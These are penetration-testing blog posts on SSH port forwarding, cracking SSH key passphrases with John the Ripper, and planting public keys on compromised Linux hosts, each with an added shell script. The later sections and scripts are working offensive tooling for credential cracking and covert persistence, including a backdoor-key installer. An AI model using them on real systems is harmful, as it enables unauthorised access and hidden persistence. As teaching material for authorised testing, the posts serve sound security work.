Tips & Tricks

Port Forwarding Through SSH Connections

There are multiple ways to configure SSH for port forwarding, and this post intends to serve as a handy cheatsheet that you can reference the next time you need this functionality.


When SSH is Already Established

If you already have an interactive SSH session open, you can drop into SSH's built-in command line by pressing Enter and then typing the escape sequence on the new, empty line:
~C

The tilde is only recognised as an escape character directly after a newline, and the prompt that appears is ssh>. On OpenSSH 9.2 and later this command line is disabled by default; start the session with -o EnableEscapeCommandline=yes if you need it.

At that prompt, issue the following to add a local port forward. The first port is opened on your own machine; the host:port after it is what the remote end connects to, so 127.0.0.1 here means the target's loopback interface, not yours.
-L <attackerPort>:127.0.0.1:<targetPort>

For example, say you are connected to a machine via SSH and find a web server listening on port 52846 that is bound to 127.0.0.1, so it only accepts connections from the host itself. The following forwards port 9002 on your Kali machine through the existing SSH connection to that service:
-L 9002:127.0.0.1:52846

Browsing to http://localhost:9002 on your machine now sends the request through the tunnel to port 52846 on the remote system. The listening side binds only to your loopback interface unless you prefix the spec with a bind address (for example 0.0.0.0:9002:127.0.0.1:52846), which you should do only if you deliberately want other hosts to reach the tunnel.
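The same forward can be set up from a fresh ssh invocation instead of the escape prompt. The script below is an added example and not part of the original post: it normalises and validates a -L spec (defaulting the bind address to 127.0.0.1 so the tunnel stays on loopback), then starts the tunnel in the background with -N (no remote shell), -f (background after authentication) and -o ExitOnForwardFailure=yes, so a local port that is already taken makes ssh exit non-zero instead of quietly running without the forward. user@target, the port numbers and the script name are placeholders.

```shell
#!/bin/sh
# Added example: wrapper around "ssh -L" for a local port forward.
# Spec grammar is the one ssh itself accepts: [bind_address:]port:host:hostport

# Normalise a -L spec. Prints bind:port:host:hostport, defaulting bind to
# 127.0.0.1 so the listening end is not exposed to the LAN. Returns 1 on a
# malformed spec, a non-numeric port or a port outside 1-65535.
parse_forward_spec() {
    pf_spec=$1
    case "$pf_spec" in
        *:*:*:*) pf_bind=${pf_spec%%:*}; pf_rest=${pf_spec#*:} ;;
        *:*:*)   pf_bind=127.0.0.1;      pf_rest=$pf_spec ;;
        *) echo "malformed forward spec: $pf_spec" >&2; return 1 ;;
    esac
    pf_port=${pf_rest%%:*}; pf_rest=${pf_rest#*:}
    pf_host=${pf_rest%%:*}; pf_hostport=${pf_rest#*:}
    for pf_p in "$pf_port" "$pf_hostport"; do
        case "$pf_p" in
            ''|*[!0-9]*) echo "port is not a number: '$pf_p'" >&2; return 1 ;;
        esac
        if [ "$pf_p" -lt 1 ] || [ "$pf_p" -gt 65535 ]; then
            echo "port out of range: $pf_p" >&2; return 1
        fi
    done
    [ -n "$pf_host" ] || { echo "empty destination host" >&2; return 1; }
    printf '%s:%s:%s:%s\n' "$pf_bind" "$pf_port" "$pf_host" "$pf_hostport"
}

# The port opened on this machine (what you point your browser or tool at).
local_port_of() {
    lp_rest=${1#*:}
    printf '%s\n' "${lp_rest%%:*}"
}

# Start the tunnel. -N: run no remote command, -f: background after auth,
# ExitOnForwardFailure: exit non-zero if the local port cannot be bound.
start_forward() {
    sf_spec=$(parse_forward_spec "$1") || return 1
    sf_target=$2
    ssh -f -N -o ExitOnForwardFailure=yes -L "$sf_spec" "$sf_target" || return 1
    echo "forward up: local port $(local_port_of "$sf_spec") now reaches the remote service"
}

# Usage: ./forward.sh 9002:127.0.0.1:52846 user@target
if [ "$#" -eq 2 ]; then
    start_forward "$1" "$2"
fi
```

Once the tunnel is up, ss -ltnp on your machine should show the ssh process listening on the chosen local port, and curl http://127.0.0.1:9002/ should return the remote page. Because the tunnel runs detached with -f, remember to kill that ssh process when you are done.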

Hacking Tutorial

Cracking SSH Keys Using John

Private keys you recover during an engagement are sometimes passphrase-protected, so the file alone will not authenticate you. When that happens, John the Ripper can convert the encrypted key into a hash format it understands (the key's encryption parameters plus the ciphertext) so the passphrase can be guessed offline against a wordlist.


First, extract the hash with sshng2john (John the Ripper jumbo now ships the same tool as ssh2john.py). Running it without redirection lets you confirm the key parsed correctly and see the hash it produced:
python sshng2john.py ssh.key

Then rerun it, redirecting the output to a file for john to read:
python sshng2john.py ssh.key > hash.ssh

Finally, pass the hash file to john for a dictionary attack. Keys in the newer openssh-key-v1 format protect the passphrase with the bcrypt KDF, so expect each guess to be far slower than for a legacy PEM key.
john --wordlist=/opt/wordlists/rockyou.txt hash.ssh
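Before spending CPU time, it is worth checking that the key is actually encrypted, and after john reports a result it is worth confirming the passphrase unlocks the key. The script below is an added example, not from the original post. It detects passphrase protection in both key layouts (the "Proc-Type: 4,ENCRYPTED" header of legacy PEM keys, and the cipher-name field that openssh-key-v1 keys store right after their magic string), builds constructed sample files that carry only those header fields so the detector can be exercised without real key material, and wraps the ssh2john/john run with a final ssh-keygen -y check. The SSH2JOHN path is an assumption (ssh2john.py from John the Ripper jumbo, at /usr/share/john/ssh2john.py on Kali; the page's sshng2john.py takes the same arguments).

```shell
#!/bin/sh
# Added example: decide whether a recovered key actually needs cracking, run the
# john workflow, and verify john's answer against the real key before trusting it.
# SSH2JOHN is an assumption: ssh2john.py from John the Ripper jumbo lives at
# /usr/share/john/ssh2john.py on Kali; sshng2john.py takes the same arguments.
SSH2JOHN=${SSH2JOHN:-/usr/share/john/ssh2john.py}

# Return 0 if the private key is passphrase-protected, 1 if it is stored in the clear.
# Legacy PEM keys announce encryption with a "Proc-Type: 4,ENCRYPTED" header.
# openssh-key-v1 keys carry the cipher name right after the 15-byte magic and a
# 4-byte length, so bytes 19-22 of the decoded body read "none" for an
# unencrypted key and the start of a cipher name (e.g. "aes2") otherwise.
key_is_encrypted() {
    kie_file=$1
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$kie_file"; then
        return 0
    fi
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$kie_file"; then
        kie_cipher=$(sed -e '1d' -e '$d' "$kie_file" | base64 -d 2>/dev/null | head -c 23 | tail -c 4)
        if [ "$kie_cipher" = none ]; then return 1; else return 0; fi
    fi
    return 1
}

# Constructed sample: a file shaped like an openssh-key-v1 key whose body holds
# only the magic, cipher and KDF fields. Not usable key material; it exists so
# the detector above can be exercised without a real key.
make_fake_openssh_key() {
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        if [ "$2" = encrypted ]; then
            printf 'openssh-key-v1\000\000\000\000\012aes256-ctr\000\000\000\006bcrypt' | base64
        else
            printf 'openssh-key-v1\000\000\000\000\004none\000\000\000\004none' | base64
        fi
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$1"
}

# Constructed sample in the legacy PEM layout, with or without the encryption headers.
make_fake_pem_key() {
    {
        echo '-----BEGIN RSA PRIVATE KEY-----'
        if [ "$2" = encrypted ]; then
            echo 'Proc-Type: 4,ENCRYPTED'
            echo 'DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF'
            echo
        fi
        echo 'bm90IHJlYWw='   # constructed filler, not key material
        echo '-----END RSA PRIVATE KEY-----'
    } > "$1"
}

# Extract the hash, crack it against a wordlist, then confirm the candidate by
# unlocking the key with ssh-keygen -y instead of trusting john's verdict alone.
# Prints the passphrase on success.
crack_key() {
    ck_key=$1; ck_wordlist=$2
    if ! key_is_encrypted "$ck_key"; then
        echo "$ck_key is not passphrase-protected; use it as-is" >&2
        return 1
    fi
    python3 "$SSH2JOHN" "$ck_key" > "$ck_key.hash" || return 1
    john --wordlist="$ck_wordlist" "$ck_key.hash" >/dev/null
    # john --show prints "<file>:<passphrase>" for each cracked hash.
    ck_pass=$(john --show "$ck_key.hash" | head -n 1 | cut -d: -f2)
    if [ -z "$ck_pass" ]; then
        echo "no passphrase found in $ck_wordlist" >&2
        return 1
    fi
    if ssh-keygen -y -P "$ck_pass" -f "$ck_key" >/dev/null 2>&1; then
        printf '%s\n' "$ck_pass"
    else
        echo "john reported '$ck_pass' but ssh-keygen rejects it; treat as a false positive" >&2
        return 1
    fi
}

# Usage: ./crack_key.sh ssh.key /opt/wordlists/rockyou.txt
if [ "$#" -eq 2 ]; then
    crack_key "$1" "$2"
fi
```

The ssh-keygen -y step matters because it exercises the real key with the candidate passphrase: it prints the public key on success and exits non-zero with "incorrect passphrase" otherwise, which is a cheaper and more trustworthy check than trying the key against the target.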

Tips & Tricks

Dropping SSH Keys on Compromised Linux Hosts

Once you have a reverse shell, consider dropping an SSH public key into the user's authorized_keys so you can come back over a proper SSH session later. This guide is a quick walkthrough of how to do that.


From the Compromised Remote Host:

Navigate to the following directory, creating it if it does not exist. It must be owned by the user and writable only by them (mode 700): sshd's StrictModes setting, which is on by default, silently ignores authorized_keys when this directory, the file, or the home directory above them is writable by anyone else.

/home/<user>/.ssh

Change into it and generate a key pair with the following command. It prompts for a passphrase; leave it empty unless you want to type one every time you come back.

ssh-keygen -f id_rsa

This produces id_rsa (the private key) and id_rsa.pub (the public key). Append the public key to authorized_keys rather than overwriting the file, so any keys the user already relies on keep working and nothing visibly breaks for them:

cat id_rsa.pub >> authorized_keys

Then get the private key onto your own system: print it with the following command and copy the output. Because the pair was generated on the target, the private key is also sitting on its disk; once you have a working copy, delete id_rsa and id_rsa.pub there, since only authorized_keys needs to remain.

cat id_rsa


On Your Local System:

Create a new file by running the following command and pasting the contents of your clipboard.

vi id_rsa

Then restrict the file's permissions; ssh refuses to use a private key that other users can read.

chmod 600 id_rsa

That's it. Point ssh at the key file you just created (without -i it would look for ~/.ssh/id_rsa instead) and you should get a shell:

ssh -i id_rsa user@targetIP
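The walkthrough above generates the key pair on the target and relies on pasting a private key back through the reverse shell. The script below is an added example, not from the original post, for the variant a practitioner usually prefers: generate the pair on your own machine so the private key never touches the target's disk, and push only the one-line public key. The function creates ~/.ssh and authorized_keys with the modes StrictModes requires, appends the key only if that exact line is not already present (so running it twice leaves one entry), and hands ownership back when run as root on behalf of another user. The key file name drop_key, user@targetIP and the script name are placeholders.

```shell
#!/bin/sh
# Added example: install a public key for persistence without clobbering the
# user's existing authorized_keys. Generate the pair on YOUR machine; only the
# .pub line is pasted into the shell on the target.
#
#   attacker$ ssh-keygen -t ed25519 -N '' -f ./drop_key    # no passphrase prompt
#   attacker$ cat drop_key.pub                              # paste this line on the target
#   attacker$ ssh -i ./drop_key user@targetIP               # afterwards

# Append one public-key line to <home>/.ssh/authorized_keys, creating the
# directory and file with the modes sshd's StrictModes (on by default) insists
# on: 700 for .ssh, 600 for authorized_keys. Idempotent: an already-present
# line is not appended again. Second argument defaults to $HOME.
install_authorized_key() {
    iak_pub=$1
    iak_home=${2:-$HOME}
    iak_dir=$iak_home/.ssh
    iak_file=$iak_dir/authorized_keys
    case "$iak_pub" in
        ssh-ed25519\ *|ssh-rsa\ *|ecdsa-sha2-*\ *|sk-*\ *) ;;
        *) echo "does not look like a public key line: $iak_pub" >&2; return 1 ;;
    esac
    mkdir -p "$iak_dir" && chmod 700 "$iak_dir" || return 1
    [ -f "$iak_file" ] || : > "$iak_file"
    chmod 600 "$iak_file" || return 1
    if ! grep -qxF -- "$iak_pub" "$iak_file"; then
        printf '%s\n' "$iak_pub" >> "$iak_file"
    fi
    # Running as root for another user: hand ownership back or sshd ignores the file.
    if [ "$(id -u)" -eq 0 ] && [ -n "$2" ]; then
        iak_owner=$(stat -c %U "$iak_home" 2>/dev/null) && chown -R "$iak_owner" "$iak_dir"
    fi
}

# Number of times a given key line appears in <home>/.ssh/authorized_keys.
count_key() {
    grep -cxF -- "$1" "$2/.ssh/authorized_keys"
}

# Octal mode of a path (GNU stat first, BSD stat as fallback).
mode_of() {
    stat -c %a "$1" 2>/dev/null || stat -f %Lp "$1"
}

# Usage on the target: ./drop_key.sh 'ssh-ed25519 AAAA... drop_key' [/home/user]
if [ "$#" -ge 1 ]; then
    install_authorized_key "$1" "$2" && echo "key installed in ${2:-$HOME}/.ssh/authorized_keys"
fi
```

If the login still fails afterwards, check the target's sshd_config for PubkeyAuthentication no or a non-default AuthorizedKeysFile, and run ssh -v from your side: "Offering public key" followed by a fall-through to password authentication usually means a permissions or ownership problem on the target.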